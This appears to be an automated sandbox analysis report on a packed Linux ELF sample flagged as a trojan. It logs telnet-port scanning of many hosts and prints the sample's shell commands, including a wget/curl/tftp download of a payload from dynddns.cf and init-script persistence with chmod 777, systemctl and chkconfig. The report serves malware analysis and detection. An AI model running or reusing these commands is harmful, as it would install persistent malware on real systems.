Source: global trafficTCP traffic: 192.168.1.101:24466 -> 92.119.208.207:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 53.92.5.153:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 145.102.44.212:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 110.12.13.117:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 181.164.176.119:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 185.101.222.143:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 133.80.138.178:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 45.99.129.214:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 54.198.252.237:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 222.184.139.138:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 57.248.162.223:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 157.35.143.71:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.134.6.208:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.32.24.238:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 207.22.188.222:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 180.74.199.193:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 153.98.185.221:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 81.84.52.27:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 146.89.6.75:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 184.199.173.106:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 97.104.42.66:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 95.1.201.204:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 31.190.219.49:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 72.141.22.92:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 126.44.121.102:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 44.12.86.39:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 133.246.151.54:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.206.11.92:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 27.243.14.243:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.1.46.119:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.98.118.23:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 48.20.231.209:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 145.86.77.239:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 194.211.147.8:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.190.188.162:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.106.250.17:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 52.185.237.240:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 166.58.30.120:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 102.156.181.46:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 68.199.184.67:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 160.215.155.54:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 187.26.177.0:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 57.4.106.202:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 195.145.127.87:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 105.158.13.95:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 5.83.239.32:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 153.220.185.154:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 184.4.36.205:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.159.73.49:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 159.44.82.10:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 117.73.89.87:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 44.24.179.56:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 79.138.227.92:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 90.101.200.6:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 82.158.248.113:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 189.148.11.71:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 171.47.216.82:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 211.129.222.246:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 173.184.104.225:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.231.75.39:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 101.222.195.93:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 152.230.229.29:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 31.93.85.25:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 183.52.164.223:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.46.14.249:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 144.102.241.227:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 114.76.95.151:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 211.49.72.227:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 171.99.204.139:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 39.44.3.182:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 92.135.235.65:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 84.168.11.202:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 186.233.58.179:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 129.154.155.191:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 219.142.80.203:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 213.38.211.220:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 143.167.216.199:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 84.194.157.240:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 78.52.175.77:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.65.11.232:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 115.21.219.238:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 205.148.22.51:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 154.108.129.128:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.21.34.239:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 129.17.72.161:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 217.154.6.207:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 163.87.1.101:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 115.18.140.226:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 164.251.146.44:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 159.103.30.178:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 86.39.141.50:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 120.131.108.58:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 52.139.254.84:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 173.72.168.157:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 80.199.247.159:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 79.233.25.191:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 190.87.254.116:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 112.65.84.154:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 158.44.247.108:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 63.207.217.212:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 165.119.184.187:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 202.253.48.119:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 149.95.42.194:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 27.190.102.150:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 174.172.113.148:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.51.178.152:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 193.193.228.51:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 200.150.29.117:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 120.123.88.66:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 80.65.61.134:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 19.211.252.232:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 207.119.73.246:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 186.95.9.171:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 147.165.138.0:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 205.206.19.231:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 180.217.50.139:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 67.115.47.147:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 119.74.241.17:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.85.102.50:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 133.210.138.110:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 115.182.83.0:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 87.170.126.119:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 153.251.196.144:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 158.164.243.65:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 2.187.105.19:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 61.158.166.9:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 71.150.87.116:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 132.13.16.211:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 203.154.73.117:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 70.255.85.114:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 71.113.246.135:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 204.243.54.233:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 80.226.249.207:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 151.170.233.46:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 17.177.113.162:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 138.51.93.177:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 208.166.165.1:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 53.97.87.151:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 211.138.154.3:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 59.52.254.211:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 80.171.190.181:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 61.140.133.9:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 103.124.158.172:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 97.107.209.221:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 65.203.12.229:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 188.31.1.224:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 23.124.216.194:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 193.129.118.192:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 2.225.138.147:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 222.225.168.119:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 62.228.124.147:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 221.246.148.33:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 158.145.19.28:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 107.65.38.52:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 176.13.26.138:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 65.123.77.99:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 169.0.197.198:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 150.29.184.97:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 198.156.180.187:2323
Source: global trafficTCP traffic: 192.168.1.101:24466 -> 165.17.63.206:2323
Executes the "wget" command typically used for HTTP/S downloadingShow sources
Source: /bin/sh (PID: 3104)Wget executable: /bin/wget -> wget http://dynddns.cf/start/help/start -O start
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /mail/
Source: global trafficHTTP traffic detected: GET /mail/
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 106.243.152.204
Source: unknownTCP traffic detected without corresponding DNS query: 73.180.94.204
Source: unknownTCP traffic detected without corresponding DNS query: 190.50.145.205
Source: unknownTCP traffic detected without corresponding DNS query: 141.17.21.205
Source: unknownTCP traffic detected without corresponding DNS query: 167.176.147.131
Source: unknownTCP traffic detected without corresponding DNS query: 117.236.182.146
Source: unknownTCP traffic detected without corresponding DNS query: 130.189.64.208
Source: unknownTCP traffic detected without corresponding DNS query: 102.179.206.82
Source: unknownTCP traffic detected without corresponding DNS query: 213.34.163.8
Source: unknownTCP traffic detected without corresponding DNS query: 167.46.24.165
Source: unknownTCP traffic detected without corresponding DNS query: 45.247.28.204
Source: unknownTCP traffic detected without corresponding DNS query: 68.234.141.53
Source: unknownTCP traffic detected without corresponding DNS query: 51.98.193.45
Source: unknownTCP traffic detected without corresponding DNS query: 36.161.120.107
Source: unknownTCP traffic detected without corresponding DNS query: 82.212.63.77
Source: unknownTCP traffic detected without corresponding DNS query: 5.254.39.27
Source: unknownTCP traffic detected without corresponding DNS query: 114.182.52.108
Source: unknownTCP traffic detected without corresponding DNS query: 199.171.96.221
Source: unknownTCP traffic detected without corresponding DNS query: 65.160.229.245
Source: unknownTCP traffic detected without corresponding DNS query: 61.190.93.73
Source: unknownTCP traffic detected without corresponding DNS query: 205.100.153.245
Source: unknownTCP traffic detected without corresponding DNS query: 54.215.105.24
Source: unknownTCP traffic detected without corresponding DNS query: 80.27.38.58
Source: unknownTCP traffic detected without corresponding DNS query: 194.191.162.217
Source: unknownTCP traffic detected without corresponding DNS query: 183.184.138.234
Source: unknownTCP traffic detected without corresponding DNS query: 183.99.203.48
Source: unknownTCP traffic detected without corresponding DNS query: 104.116.206.123
Source: unknownTCP traffic detected without corresponding DNS query: 54.162.241.70
Source: unknownTCP traffic detected without corresponding DNS query: 112.101.71.56
Source: unknownTCP traffic detected without corresponding DNS query: 159.183.63.187
Source: unknownTCP traffic detected without corresponding DNS query: 98.179.130.153
Source: unknownTCP traffic detected without corresponding DNS query: 219.175.220.13
Source: unknownTCP traffic detected without corresponding DNS query: 84.119.154.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.97.68.76
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.56.119
Source: unknownTCP traffic detected without corresponding DNS query: 51.199.234.20
Source: unknownTCP traffic detected without corresponding DNS query: 101.133.17.78
Source: unknownTCP traffic detected without corresponding DNS query: 42.255.246.119
Source: unknownTCP traffic detected without corresponding DNS query: 106.247.32.206
Source: unknownTCP traffic detected without corresponding DNS query: 130.154.3.180
Source: unknownTCP traffic detected without corresponding DNS query: 64.196.14.9
Source: unknownTCP traffic detected without corresponding DNS query: 49.24.159.81
Source: unknownTCP traffic detected without corresponding DNS query: 50.185.208.244
Source: unknownTCP traffic detected without corresponding DNS query: 157.42.236.166
Source: unknownTCP traffic detected without corresponding DNS query: 18.253.144.70
Source: unknownTCP traffic detected without corresponding DNS query: 75.98.229.97
Source: unknownTCP traffic detected without corresponding DNS query: 46.190.226.93
Source: unknownTCP traffic detected without corresponding DNS query: 155.165.89.84
Source: unknownTCP traffic detected without corresponding DNS query: 32.56.239.68
Source: unknownTCP traffic detected without corresponding DNS query: 155.81.131.224
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /mail/
Source: global trafficHTTP traffic detected: GET /mail/
Source: global trafficHTTP traffic detected: GET /start/help/start HTTP/1.1User-Agent: Wget/1.14 (linux-gnu)Accept: */*Host: dynddns.cfConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /start/help/start HTTP/1.1User-Agent: curl/7.29.0Host: dynddns.cfAccept: */*
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: dynddns.cf
Urls found in memory or binary dataShow sources
Source: agJPi4fCrP, start.20.drString found in binary or memory: http://upx.sf.net

DDoS:

barindex
Searches for CPU information (likely indicative for DDoS capability)Show sources
Source: /bin/sh (PID: 3191)Executable: /bin/grep -> grep -c ^processor /proc/cpuinfo
Executes the "free" command used for querying memory usage (likely indicative for DDoS or mining capabilities)Show sources
Source: /bin/sh (PID: 3205)Free executable: /bin/free -> free

System Summary:

barindex
Sample contains only a LOAD segment without any section mappingsShow sources
Source: LOAD without section mappingsProgram segment: 0x400000
Yara signature matchShow sources
Source: agJPi4fCrP, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Classification labelShow sources
Source: classification engineClassification label: mal64.troj.evad.mine.lin@0/2@6/0

Data Obfuscation:

barindex
Sample is packed with UPXShow sources
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $

Persistence and Installation Behavior:

barindex
Sample tries to persist itself using System V runlevelsShow sources
Source: /bin/wget (PID: 3104)File: /etc/rc.d/init.d/start
Source: /bin/curl (PID: 3129)File: /etc/rc.d/init.d/start
Source: /bin/ln (PID: 3146)File: /etc/rc.d/dynddns.cftart -> /etc/init.d/start
Sets full permissions to files and/or directoriesShow sources
Source: /bin/sh (PID: 3145)Chmod executable with 777: /bin/chmod -> chmod 777 /etc/init.d/startpstart dynddns.cftart
Terminates several processes with shell command 'killall'Show sources
Source: /bin/sh (PID: 2881)Killall command executed: killall Netis
Source: /bin/sh (PID: 2882)Killall command executed: killall " "
Source: /bin/sh (PID: 2883)Killall command executed: killall " "
Counts the number of processes currently runningShow sources
Source: /tmp/agJPi4fCrP (PID: 3102)Ps with wc executed: /bin/sh -> sh -c "(cd /etc/init.d;wget http://dynddns.cf/start/help/start -O start;curl http://dynddns.cf/start/help/start -o start;tftp -g -l sshd -r starthelpstart dynddns.cftart;chmod 777 /etc/init.d/startpstart dynddns.cftart;ln -s /etc/init.d/start /etc/rc.d/dynddns.cftart;update-rc.d start defaultstc/rc.d/dynddns.cftart;/lib/systemd/systemd-sysv-install enable startrt;systemctl enable startysv-install enable startrt;chkconfig --add starttysv-install enable startrt;chkconfig start onarttysv-install enable startrt;" "dev/null 2>&1"
Source: /bin/sh (PID: 3145)Ps with wc executed: /bin/chmod -> chmod 777 /etc/init.d/startpstart dynddns.cftart
Source: /tmp/agJPi4fCrP (PID: 3267)Ps with wc executed: /bin/sh -> sh -c "ps aux | wc -l"
Source: /bin/sh (PID: 3274)Ps with wc executed: /bin/ps -> ps aux
Source: /bin/sh (PID: 3275)Ps with wc executed: /bin/wc -> wc -l
Enumerates processes within the "proc" file systemShow sources
Source: /bin/killall (PID: 2881)File opened: /proc/89/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2034/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2034/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/352/stat
Source: /bin/killall (PID: 2881)File opened: /proc/353/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1974/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1974/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2029/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2029/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/993/stat
Source: /bin/killall (PID: 2881)File opened: /proc/477/stat
Source: /bin/killall (PID: 2881)File opened: /proc/631/stat
Source: /bin/killall (PID: 2881)File opened: /proc/632/stat
Source: /bin/killall (PID: 2881)File opened: /proc/995/stat
Source: /bin/killall (PID: 2881)File opened: /proc/90/stat
Source: /bin/killall (PID: 2881)File opened: /proc/10/stat
Source: /bin/killall (PID: 2881)File opened: /proc/11/stat
Source: /bin/killall (PID: 2881)File opened: /proc/13/stat
Source: /bin/killall (PID: 2881)File opened: /proc/14/stat
Source: /bin/killall (PID: 2881)File opened: /proc/15/stat
Source: /bin/killall (PID: 2881)File opened: /proc/16/stat
Source: /bin/killall (PID: 2881)File opened: /proc/17/stat
Source: /bin/killall (PID: 2881)File opened: /proc/18/stat
Source: /bin/killall (PID: 2881)File opened: /proc/19/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2320/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1351/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2162/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2162/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/363/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1349/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1/stat
Source: /bin/killall (PID: 2881)File opened: /proc/364/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1623/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1623/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2/stat
Source: /bin/killall (PID: 2881)File opened: /proc/3/stat
Source: /bin/killall (PID: 2881)File opened: /proc/4/stat
Source: /bin/killall (PID: 2881)File opened: /proc/5/stat
Source: /bin/killall (PID: 2881)File opened: /proc/6/stat
Source: /bin/killall (PID: 2881)File opened: /proc/7/stat
Source: /bin/killall (PID: 2881)File opened: /proc/8/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1907/stat
Source: /bin/killall (PID: 2881)File opened: /proc/9/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1903/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2837/stat
Source: /bin/killall (PID: 2881)File opened: /proc/20/stat
Source: /bin/killall (PID: 2881)File opened: /proc/21/stat
Source: /bin/killall (PID: 2881)File opened: /proc/22/stat
Source: /bin/killall (PID: 2881)File opened: /proc/27/stat
Source: /bin/killall (PID: 2881)File opened: /proc/28/stat
Source: /bin/killall (PID: 2881)File opened: /proc/29/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1919/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1919/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2055/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2175/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2052/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2052/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2051/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1910/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2207/stat
Source: /bin/killall (PID: 2881)File opened: /proc/376/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1633/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1633/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/377/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2325/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2325/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2600/stat
Source: /bin/killall (PID: 2881)File opened: /proc/378/stat
Source: /bin/killall (PID: 2881)File opened: /proc/653/stat
Source: /bin/killall (PID: 2881)File opened: /proc/653/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/379/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2048/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2048/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2169/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2169/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/2323/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2323/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/1871/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2047/stat
Source: /bin/killall (PID: 2881)File opened: /proc/656/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2046/stat
Source: /bin/killall (PID: 2881)File opened: /proc/659/stat
Source: /bin/killall (PID: 2881)File opened: /proc/30/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2847/stat
Source: /bin/killall (PID: 2881)File opened: /proc/38/stat
Source: /bin/killall (PID: 2881)File opened: /proc/39/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2100/stat
Source: /bin/killall (PID: 2881)File opened: /proc/380/stat
Source: /bin/killall (PID: 2881)File opened: /proc/381/stat
Source: /bin/killall (PID: 2881)File opened: /proc/382/stat
Source: /bin/killall (PID: 2881)File opened: /proc/383/stat
Source: /bin/killall (PID: 2881)File opened: /proc/383/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/384/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2060/stat
Source: /bin/killall (PID: 2881)File opened: /proc/385/stat
Source: /bin/killall (PID: 2881)File opened: /proc/385/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/660/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1525/stat
Source: /bin/killall (PID: 2881)File opened: /proc/2218/stat
Source: /bin/killall (PID: 2881)File opened: /proc/386/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1920/stat
Source: /bin/killall (PID: 2881)File opened: /proc/1920/cmdline
Source: /bin/killall (PID: 2881)File opened: /proc/1643/stat
Source: /bin/killall (PID: 2881)File opened: /proc/268/stat
Source: /bin/killall (PID: 2881)File opened: /proc/664/stat
Executes commands using a shell command-line interpreterShow sources
Source: /tmp/agJPi4fCrP (PID: 2877)Shell command executed: sh -c "(killall Netis >/dev/null 2>&1 & killall \" \" >/dev/null 2>&1 & killall \" \" >/dev/null 2>&1) >/dev/null 2>&1"
Source: /tmp/agJPi4fCrP (PID: 3102)Shell command executed: sh -c "(cd /etc/init.d;wget http://dynddns.cf/start/help/start -O start;curl http://dynddns.cf/start/help/start -o start;tftp -g -l sshd -r starthelpstart dynddns.cftart;chmod 777 /etc/init.d/startpstart dynddns.cftart;ln -s /etc/init.d/start /etc/rc.d/dynddns.cftart;update-rc.d start defaultstc/rc.d/dynddns.cftart;/lib/systemd/systemd-sysv-install enable startrt;systemctl enable startysv-install enable startrt;chkconfig --add starttysv-install enable startrt;chkconfig start onarttysv-install enable startrt;" "dev/null 2>&1"
Source: /tmp/agJPi4fCrP (PID: 3191)Shell command executed: sh -c "grep -c ^processor /proc/cpuinfo"
Source: /tmp/agJPi4fCrP (PID: 3200)Shell command executed: sh -c "free|grep \"Mem:\"|awk '{print $2 \" KB\"}'||printf \"Ram Not Found\n\""
Source: /tmp/agJPi4fCrP (PID: 3227)Shell command executed: sh -c "if [ -f /usr/bin/yum ]; then cat /etc/system-release|head -n1; elif [ -f /usr/bin/apt-get ]; then lsb_release -d|awk '{$1= \"\"; print $0}'|head -n1 ; elif [ -f /usr/bin/install ]; then busybox|head -n1|awk '{print $1\" \"$2}';fi"
Source: /tmp/agJPi4fCrP (PID: 3248)Shell command executed: sh -c "uname -r"
Source: /tmp/agJPi4fCrP (PID: 3261)Shell command executed: sh -c "uname -n"
Source: /tmp/agJPi4fCrP (PID: 3267)Shell command executed: sh -c "ps aux | wc -l"
Executes the "chmod" command used to modify permissionsShow sources
Source: /bin/sh (PID: 3145)Chmod executable: /bin/chmod -> chmod 777 /etc/init.d/startpstart dynddns.cftart
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/sh (PID: 3191)Grep executable: /bin/grep -> grep -c ^processor /proc/cpuinfo
Source: /bin/sh (PID: 3206)Grep executable: /bin/grep -> grep Mem:
Executes the "ps" command used to list the status of processesShow sources
Source: /bin/sh (PID: 3274)Ps executable: /bin/ps -> ps aux
Executes the "systemctl" command used for controlling the systemd system and service managerShow sources
Source: /bin/sh (PID: 3152)Systemctl executable: /bin/systemctl -> systemctl enable startysv-install enable startrt
Executes the "wget" command typically used for HTTP/S downloadingShow sources
Source: /bin/sh (PID: 3104)Wget executable: /bin/wget -> wget http://dynddns.cf/start/help/start -O start
Reads system information from the proc file systemShow sources
Source: /bin/sh (PID: 2877)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3102)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3191)Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 3191)Reads from proc file: /proc/cpuinfo
Source: /bin/sh (PID: 3200)Reads from proc file: /proc/meminfo
Source: /bin/free (PID: 3205)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3227)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3248)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3261)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 3267)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 3274)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 3274)Reads from proc file: /proc/stat
Writes ELF files to diskShow sources
